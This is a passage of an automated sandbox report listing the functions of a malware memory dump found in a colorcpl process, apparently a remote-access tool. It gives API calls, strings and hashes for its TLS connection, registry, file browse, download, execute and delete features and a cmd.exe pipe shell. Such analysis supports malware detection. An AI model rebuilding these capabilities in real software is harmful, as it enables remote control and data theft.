                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                        • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                        • API String ID: 994465650-2151626615
                                        • Opcode ID: 5a1fa55338a7c12ac80322ddef1279b07c572f3852051929ee2b0ef7b0f0e71a
                                        • Instruction ID: be221d0f1193b248af734c9e61e3e7b88141f8687091888c07ee22aa51252f7b
                                        • Opcode Fuzzy Hash: 5a1fa55338a7c12ac80322ddef1279b07c572f3852051929ee2b0ef7b0f0e71a
                                        • Instruction Fuzzy Hash: 7341EB76B402067BFF14BB798A5693DBBA9FB55208B80418DD81147681FF12BC21C7D7
                                        Function 04A84E06 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,000000FF,00000000,04AF1E90,?,00000000,04AF1E90,04A84C88,00000000,?,?,00000000,04AF1E90,04A84AA9), ref: 04A84E18
                                        • SetEvent.KERNEL32(?,?,00000000,04AF1E90,04A84C88,00000000,?,?,00000000,04AF1E90,04A84AA9), ref: 04A84E23
                                        • CloseHandle.KERNEL32(?,?,00000000,04AF1E90,04A84C88,00000000,?,?,00000000,04AF1E90,04A84AA9), ref: 04A84E2C
                                        • closesocket.WS2_32(?), ref: 04A84E3A
                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,04AF1E90,04A84C88,00000000,?,?,00000000,04AF1E90,04A84AA9), ref: 04A84E71
                                        • SetEvent.KERNEL32(?,?,00000000,04AF1E90,04A84C88,00000000,?,?,00000000,04AF1E90,04A84AA9), ref: 04A84E82
                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,04AF1E90,04A84C88,00000000,?,?,00000000,04AF1E90,04A84AA9), ref: 04A84E89
                                        • SetEvent.KERNEL32(?,?,00000000,04AF1E90,04A84C88,00000000,?,?,00000000,04AF1E90,04A84AA9), ref: 04A84E9A
                                        • CloseHandle.KERNEL32(?,?,00000000,04AF1E90,04A84C88,00000000,?,?,00000000,04AF1E90,04A84AA9), ref: 04A84E9F
                                        • CloseHandle.KERNEL32(?,?,00000000,04AF1E90,04A84C88,00000000,?,?,00000000,04AF1E90,04A84AA9), ref: 04A84EA4
                                        • SetEvent.KERNEL32(?,?,00000000,04AF1E90,04A84C88,00000000,?,?,00000000,04AF1E90,04A84AA9), ref: 04A84EB1
                                        • CloseHandle.KERNEL32(?,?,00000000,04AF1E90,04A84C88,00000000,?,?,00000000,04AF1E90,04A84AA9), ref: 04A84EB6
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                        • String ID:
                                        • API String ID: 3658366068-0
                                        • Opcode ID: e00e5fbd5d9ba3198436ded260d8c3b7ebe791fd781c85c3e136070ec347788f
                                        • Instruction ID: 23afa721f593ca7912d2544d38beca2b5ef696dcaaf80abca0ab65e365f1a1ca
                                        • Opcode Fuzzy Hash: e00e5fbd5d9ba3198436ded260d8c3b7ebe791fd781c85c3e136070ec347788f
                                        • Instruction Fuzzy Hash: 16210431501B01AFDB21AF25DD49B1ABBE6FF40326F104A1CE1A316AF0DB66B851DB54
                                        Function 04A8C5ED Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 04A8C753
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LongNamePath
                                        • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                        • API String ID: 82841172-425784914
                                        • Opcode ID: 04af934db21cbca7ef1622e942bfb253bc62f8323bf2ebf724f3ba15072259eb
                                        • Instruction ID: c3009b2950dcdad9568042ab17f443f563cf49b5cc058a79a58867e8de45014a
                                        • Opcode Fuzzy Hash: 04af934db21cbca7ef1622e942bfb253bc62f8323bf2ebf724f3ba15072259eb
                                        • Instruction Fuzzy Hash: 57415171108301ABE604FB61DE51CFFB7E8EFA5618F10092EF556560A1FF60BD0ACA62
                                        Function 04A992AE Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1053 4a992ae-4a99305 call 4a99f23 call 4a91f91 call 4a81fc2 call 4a81fb8 call 4a860ea 1064 4a99348-4a99351 1053->1064 1065 4a99307-4a99316 call 4a91f91 1053->1065 1066 4a9935a 1064->1066 1067 4a99353-4a99358 1064->1067 1070 4a9931b-4a99332 call 4a81f8b StrToIntA 1065->1070 1069 4a9935f-4a9936a call 4a8535d 1066->1069 1067->1069 1075 4a99340-4a99343 call 4a81fb8 1070->1075 1076 4a99334-4a9933d call 4a9accf 1070->1076 1075->1064 1076->1075
                                        APIs
                                          • Part of subcall function 04A99F23: GetCurrentProcess.KERNEL32(?,?,?,04A8C663,WinDir,00000000,00000000), ref: 04A99F34
                                          • Part of subcall function 04A91F91: RegOpenKeyExA.KERNEL32(80000002,00000400,00000000,00020019,?), ref: 04A91FB5
                                          • Part of subcall function 04A91F91: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 04A91FD2
                                          • Part of subcall function 04A91F91: RegCloseKey.KERNEL32(?), ref: 04A91FDD
                                        • StrToIntA.SHLWAPI(00000000,04AE9710,00000000,00000000,00000000,04AF1FFC,00000001,?,?,?,?,?,?,04A8D6A0), ref: 04A99327
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseCurrentOpenProcessQueryValue
                                        • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                        • API String ID: 1866151309-2070987746
                                        • Opcode ID: 3c466bdbb75bfc8d74b65f411c8b2f36fa716a34423676951d01e4beddbdd3e1
                                        • Instruction ID: 4736e5a5006696d60c364dcdc76444eb075a224a722d2f459778302bc2f65824
                                        • Opcode Fuzzy Hash: 3c466bdbb75bfc8d74b65f411c8b2f36fa716a34423676951d01e4beddbdd3e1
                                        • Instruction Fuzzy Hash: E811E3F1A002047BFB00BB659C9AABFB7EDDB90114F44062DE906572D1FB657C4787A1
                                        Function 04A84F31 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1127 4a84f31-4a84f3f 1128 4a84fca 1127->1128 1129 4a84f45-4a84f4c 1127->1129 1130 4a84fcc-4a84fd1 1128->1130 1131 4a84f4e-4a84f52 1129->1131 1132 4a84f54-4a84f5b 1129->1132 1133 4a84fa0-4a84fc8 CreateEventA CreateThread 1131->1133 1132->1133 1134 4a84f5d-4a84f9b GetLocalTime call 4a99b16 call 4a852dd call 4a82073 call 4a994da call 4a81fb8 1132->1134 1133->1130 1134->1133
                                        APIs
                                        • GetLocalTime.KERNEL32(?), ref: 04A84F61
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 04A84FAD
                                        • CreateThread.KERNEL32(00000000,00000000,Function_00005130,?,00000000,00000000), ref: 04A84FC0
                                        Strings
                                        • Connection KeepAlive | Enabled | Timeout: , xrefs: 04A84F74
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Create$EventLocalThreadTime
                                        • String ID: Connection KeepAlive | Enabled | Timeout:
                                        • API String ID: 2532271599-507513762
                                        • Opcode ID: b97bf0218d323b5cde1b9eca8a8a16ff645312b732fe03feb4043e49d4b5a447
                                        • Instruction ID: 71c688129f77b23438d297fbdcec3759d04adb4101ca8df85ce333bc29329d1d
                                        • Opcode Fuzzy Hash: b97bf0218d323b5cde1b9eca8a8a16ff645312b732fe03feb4043e49d4b5a447
                                        • Instruction Fuzzy Hash: 9B11A7319042847FEB20BB76980DAAB7FFCDBD6B14F04054DE85546281E6B4B845CBB1
                                        Function 04A9215F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1144 4a9215f-4a92176 RegCreateKeyA 1145 4a92178-4a921ad call 4a8245c call 4a81f8b RegSetValueExA RegCloseKey 1144->1145 1146 4a921af 1144->1146 1148 4a921b1-4a921bf call 4a81fb8 1145->1148 1146->1148
                                        APIs
                                        • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 04A9216E
                                        • RegSetValueExA.KERNEL32(?,04AE4150,00000000,?,00000000,00000000,04AF2200,?,pth_unenc,04A8E23B,04AE4150,3.8.0 Pro), ref: 04A92196
                                        • RegCloseKey.ADVAPI32(?,?,pth_unenc,04A8E23B,04AE4150,3.8.0 Pro), ref: 04A921A1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseCreateValue
                                        • String ID: pth_unenc
                                        • API String ID: 1818849710-4028850238
                                        • Opcode ID: 9f0207034069cdb57eab0b6f60694647075e6f9393defa41a8c469727d568539
                                        • Instruction ID: 17b3dea51f16344f79da682efb09bf5d2ec35b4b203a9fb6ac8833a5393fcd22
                                        • Opcode Fuzzy Hash: 9f0207034069cdb57eab0b6f60694647075e6f9393defa41a8c469727d568539
                                        • Instruction Fuzzy Hash: 73F09632541108BFEF00AFA0DD44EEE777CEF04650F108655FD0A96150E731AE14DB90
                                        Function 04A91F34 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37registryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1154 4a91f34-4a91f5c RegOpenKeyExA 1155 4a91f8b 1154->1155 1156 4a91f5e-4a91f89 RegQueryValueExA RegCloseKey 1154->1156 1157 4a91f8d-4a91f90 1155->1157 1156->1157
                                        APIs
                                        • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 04A91F54
                                        • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,04AF2200), ref: 04A91F72
                                        • RegCloseKey.KERNEL32(?), ref: 04A91F7D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID: pth_unenc
                                        • API String ID: 3677997916-4028850238
                                        • Opcode ID: 635b02e401191619497cdeeb503f06f3ce00b62b3084a40f059e1c4901d2226e
                                        • Instruction ID: 9118f2355e173a3a274918b9d3314cc08e5cbcc8d661905dd70930998b1ae9be
                                        • Opcode Fuzzy Hash: 635b02e401191619497cdeeb503f06f3ce00b62b3084a40f059e1c4901d2226e
                                        • Instruction Fuzzy Hash: D6F01D7690020CBFEF109FE09C45FED7BBCEB04710F1081A5BA05E6140E2355E149B90
                                        Function 04A91F91 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1235 4a91f91-4a91fbd RegOpenKeyExA 1236 4a91fbf-4a91fe7 RegQueryValueExA RegCloseKey 1235->1236 1237 4a91ff2 1235->1237 1238 4a91fe9-4a91ff0 1236->1238 1239 4a91ff4 1236->1239 1237->1239 1240 4a91ff9-4a92005 call 4a82073 1238->1240 1239->1240
                                        APIs
                                        • RegOpenKeyExA.KERNEL32(80000002,00000400,00000000,00020019,?), ref: 04A91FB5
                                        • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 04A91FD2
                                        • RegCloseKey.KERNEL32(?), ref: 04A91FDD
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID:
                                        • API String ID: 3677997916-0
                                        • Opcode ID: 625506e59b1db3cbd24cfe9514ff826621b03aa7103028bbc1151ce7dba3c94d
                                        • Instruction ID: ada4af2b62df03b02c8940ed904c209a03718fe1f4080b9d405a2f8408f8d493
                                        • Opcode Fuzzy Hash: 625506e59b1db3cbd24cfe9514ff826621b03aa7103028bbc1151ce7dba3c94d
                                        • Instruction Fuzzy Hash: 6401A276A0112CBBEF209E95DD08DEE7BBDDB84250F004096BA05A2200DB71AE06DBA0
                                        Function 04AC3697 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1250 4ac3697-4ac36a2 1251 4ac36af-4ac36b5 1250->1251 1252 4ac36a4-4ac36a7 call 4ac3649 1250->1252 1254 4ac36b7-4ac36be call 4ac3c92 1251->1254 1255 4ac36c0-4ac36c3 1251->1255 1256 4ac36ac-4ac36ad 1252->1256 1268 4ac36d0 1254->1268 1258 4ac36ea-4ac36fc HeapReAlloc 1255->1258 1259 4ac36c5-4ac36ca call 4abad91 1255->1259 1261 4ac36d3-4ac36d5 1256->1261 1262 4ac36fe 1258->1262 1263 4ac36d6-4ac36dd call 4ac2a57 1258->1263 1259->1268 1267 4ac36d2 1262->1267 1263->1259 1270 4ac36df-4ac36e8 call 4ac0480 1263->1270 1267->1261 1268->1267 1270->1258 1270->1259
                                        APIs
                                        • _free.LIBCMT ref: 04AC36B8
                                          • Part of subcall function 04AC3649: RtlAllocateHeap.NTDLL(00000000,04AB3069,?,?,04AB65E7,?,?,04AF21E8,?,?,04A8C88A,04AB3069,?,?,?,?), ref: 04AC367B
                                        • HeapReAlloc.KERNEL32(00000000,?,00000001,00000000,00000001,?,04A90639,?,?,04A90955), ref: 04AC36F4
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocAllocate_free
                                        • String ID:
                                        • API String ID: 2447670028-0
                                        • Opcode ID: b6bfe66a5c1f62732b3af70e0ddfb9fe6cfc0d440de4cf54ced3658e5918974b
                                        • Instruction ID: 65dd4014820fb07e9348e72909b12cd47db37c93f54f66aea33e8c6cb0da3ad9
                                        • Opcode Fuzzy Hash: b6bfe66a5c1f62732b3af70e0ddfb9fe6cfc0d440de4cf54ced3658e5918974b
                                        • Instruction Fuzzy Hash: DBF062327052156ADFA12B26AD04B6B37689F81A75B11C11EFC55AE390EE20F40157A5
                                        Function 04A8480D Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • socket.WS2_32(?,00000001,00000006), ref: 04A84832
                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,04A852EB,?,?,?,00000000,04A8BE60,?,?,?,?,04A8520E), ref: 04A8486E
                                          • Part of subcall function 04A8487E: WSAStartup.WS2_32(00000202,00000000), ref: 04A84893
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateEventStartupsocket
                                        • String ID:
                                        • API String ID: 1953588214-0
                                        • Opcode ID: 7d954cf92dfa467154a3333f2c1987c1c8ecedd528a96f24ed0aff8236eab6a2
                                        • Instruction ID: d21ddb76f83625baf1835b9b94dee9cb04b4b9041197b7035d465289f4c31a7d
                                        • Opcode Fuzzy Hash: 7d954cf92dfa467154a3333f2c1987c1c8ecedd528a96f24ed0aff8236eab6a2
                                        • Instruction Fuzzy Hash: 8E017C71808B909FD7359F29B444696BFE0EB29304F04495EF0D69BB91D3B5A846CB50
                                        Function 04A9393F Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • getaddrinfo.WS2_32(00000000,00000000,00000000,04AEFACC,04AF1FFC,00000000,04A93BDE,00000000,00000001), ref: 04A93961
                                        • WSASetLastError.WS2_32(00000000), ref: 04A93966
                                          • Part of subcall function 04A937DC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 04A9382B
                                          • Part of subcall function 04A937DC: LoadLibraryA.KERNEL32(?), ref: 04A9386D
                                          • Part of subcall function 04A937DC: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 04A9388D
                                          • Part of subcall function 04A937DC: FreeLibrary.KERNEL32(00000000), ref: 04A93894
                                          • Part of subcall function 04A937DC: LoadLibraryA.KERNEL32(?), ref: 04A938CC
                                          • Part of subcall function 04A937DC: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 04A938DE
                                          • Part of subcall function 04A937DC: FreeLibrary.KERNEL32(00000000), ref: 04A938E5
                                          • Part of subcall function 04A937DC: GetProcAddress.KERNEL32(00000000,?), ref: 04A938F4
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                        • String ID:
                                        • API String ID: 1170566393-0
                                        • Opcode ID: f6d4d77564db57868111559437591e72a87ad3a48facbbfd29ecea571b605f65
                                        • Instruction ID: 9c190c1af7763f824e4ff826605c6deeecc9eaf6531151144a1cd7473677e878
                                        • Opcode Fuzzy Hash: f6d4d77564db57868111559437591e72a87ad3a48facbbfd29ecea571b605f65
                                        • Instruction Fuzzy Hash: 38D012763011617B9B10B69E9D00B7666ECEBA5660B050066BC15D7500D6555C0247A0
                                        Function 04A88F1F Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcslen.LIBCMT ref: 04A88F39
                                          • Part of subcall function 04A89203: CreateThread.KERNEL32(00000000,00000000,04A89305,?,00000000,00000000), ref: 04A8928B
                                          • Part of subcall function 04A89203: CreateThread.KERNEL32(00000000,00000000,04A892EF,?,00000000,00000000), ref: 04A8929B
                                          • Part of subcall function 04A89203: CreateThread.KERNEL32(00000000,00000000,04A89311,?,00000000,00000000), ref: 04A892A7
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateThread$_wcslen
                                        • String ID:
                                        • API String ID: 1119755333-0
                                        • Opcode ID: 2af8053e4439ad269cdc2fed73c8c04e1efe44e8eb88fcc1499828492a029ebd
                                        • Instruction ID: bbf3e2551773671ed9c2acb5d2495635c3e9159113590815f6ae669a4bc74f04
                                        • Opcode Fuzzy Hash: 2af8053e4439ad269cdc2fed73c8c04e1efe44e8eb88fcc1499828492a029ebd
                                        • Instruction Fuzzy Hash: 2821AD729040499BEB09FFE4EA119FE7BB9EF50214F40005DE912662C1EF25BE5ACB91
                                        Function 04AC3649 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000000,04AB3069,?,?,04AB65E7,?,?,04AF21E8,?,?,04A8C88A,04AB3069,?,?,?,?), ref: 04AC367B
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: d744d6674a9835af9d4820b3837d1069bc12c34ed3f307ce593c18496db712cc
                                        • Instruction ID: b9cc57bb7cda27b3de8e291c0902a3ee8fb3763e5dc33378ee48ed6c728fedbc
                                        • Opcode Fuzzy Hash: d744d6674a9835af9d4820b3837d1069bc12c34ed3f307ce593c18496db712cc
                                        • Instruction Fuzzy Hash: C4E0E531201220AAEFA127625C0076B768CDB423A0F06C22CEC45DA280DF61F80043E5
                                        Function 04A8487E Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WSAStartup.WS2_32(00000202,00000000), ref: 04A84893
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Startup
                                        • String ID:
                                        • API String ID: 724789610-0
                                        • Opcode ID: c84b5c24b6212ff629b4aacd7c253bb215a691256256327dd7903b46fd973190
                                        • Instruction ID: 1dcee0b9d0275117cd54f980c6a20db2f6739388ed4a989b7994fd05d06cf159
                                        • Opcode Fuzzy Hash: c84b5c24b6212ff629b4aacd7c253bb215a691256256327dd7903b46fd973190
                                        • Instruction Fuzzy Hash: B6D012725596085ED610AAB5A90F8A5775CC322A51F4003AB6CB6875C3E6442B1DC3A7
                                        Function 04AA4A7D Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: send
                                        • String ID:
                                        • API String ID: 2809346765-0
                                        • Opcode ID: 822a38140577c798c5e4fe56cb256e4d70ed4824263688be5be56027bf8715b4
                                        • Instruction ID: 3e86cf3f4a887aa005725903545b53f45e9cb0252c275a117de1a2548d0527e9
                                        • Opcode Fuzzy Hash: 822a38140577c798c5e4fe56cb256e4d70ed4824263688be5be56027bf8715b4
                                        • Instruction Fuzzy Hash: 2DB092FA208202BF8A061B60C80487A7EB6EBC8780B00881CF14740120D6769860AB22

                                        Non-executed Functions

                                        Function 04A86D28 Relevance: 32.3, APIs: 9, Strings: 9, Instructions: 810fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetEvent.KERNEL32(?,?), ref: 04A86D4A
                                        • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 04A86E18
                                        • DeleteFileW.KERNEL32(00000000), ref: 04A86E3A
                                          • Part of subcall function 04A9A01B: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,04AF2200,00000001), ref: 04A9A076
                                          • Part of subcall function 04A9A01B: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,04AF2200,00000001), ref: 04A9A0A6
                                          • Part of subcall function 04A9A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,04AF2200,00000001), ref: 04A9A0FB
                                          • Part of subcall function 04A9A01B: FindClose.KERNEL32(00000000,?,?,?,?,?,?,04AF2200,00000001), ref: 04A9A15C
                                          • Part of subcall function 04A9A01B: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,04AF2200,00000001), ref: 04A9A163
                                          • Part of subcall function 04A84A81: send.WS2_32(?,00000000,00000000,00000000), ref: 04A84B16
                                          • Part of subcall function 04A994DA: GetLocalTime.KERNEL32(00000000), ref: 04A994F4
                                          • Part of subcall function 04A84A81: WaitForSingleObject.KERNEL32(?,00000000,04A845C6,?,?,00000004,?,?,00000004,04A8BE60,00000000,?), ref: 04A84B27
                                          • Part of subcall function 04A84A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,04A8BE60,00000000,?,?,?,?,?,?,04A845C6), ref: 04A84B55
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 04A87228
                                        • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 04A87309
                                        • DeleteFileA.KERNEL32(?), ref: 04A8768E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Find$DeleteDirectoryEventRemove$AttributesCloseDriveExecuteFirstLocalLogicalNextObjectShellSingleStringsTimeWaitsend
                                        • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
                                        • API String ID: 1385304114-1507758755
                                        • Opcode ID: bd171619cded84bdf5faed46547f98ce8f01f2a03d6b21df5515e4845f72bab6
                                        • Instruction ID: 7124c874a10994d2f768c839f755b17da0e4437c476ae3cdc959d99b0f3846cb
                                        • Opcode Fuzzy Hash: bd171619cded84bdf5faed46547f98ce8f01f2a03d6b21df5515e4845f72bab6
                                        • Instruction Fuzzy Hash: DC427172A043046BFA18FB74CE659BE77A9EF91208F40091DF582571D1FE25BE0AC792
                                        Function 04A8567A Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 278pipesleepfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __Init_thread_footer.LIBCMT ref: 04A856C6
                                          • Part of subcall function 04A84A81: send.WS2_32(?,00000000,00000000,00000000), ref: 04A84B16
                                        • __Init_thread_footer.LIBCMT ref: 04A85703
                                        • CreatePipe.KERNEL32(04AF3BB4,04AF3B9C,04AF3AC0,00000000,04AE3068,00000000), ref: 04A85796
                                        • CreatePipe.KERNEL32(04AF3BA0,04AF3BBC,04AF3AC0,00000000), ref: 04A857AC
                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,04AF3AD0,04AF3BA4), ref: 04A8581F
                                        • Sleep.KERNEL32(0000012C,00000093,?), ref: 04A85877
                                        • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 04A8589C
                                        • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 04A858C9
                                          • Part of subcall function 04AB2525: __onexit.LIBCMT ref: 04AB252B
                                        • WriteFile.KERNEL32(00000000,00000000,?,00000000,04AF1F28,04AE306C,00000062,04AE3050), ref: 04A859C4
                                        • Sleep.KERNEL32(00000064,00000062,04AE3050), ref: 04A859DE
                                        • TerminateProcess.KERNEL32(00000000), ref: 04A859F7
                                        • CloseHandle.KERNEL32 ref: 04A85A03
                                        • CloseHandle.KERNEL32 ref: 04A85A0B
                                        • CloseHandle.KERNEL32 ref: 04A85A1D
                                        • CloseHandle.KERNEL32 ref: 04A85A25
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                        • String ID: SystemDrive$cmd.exe
                                        • API String ID: 2994406822-3633465311
                                        • Opcode ID: 9dc11bf39052f30d52db135ed2d5382c339bb7d9e39e7e9d517b85ce13748cf4
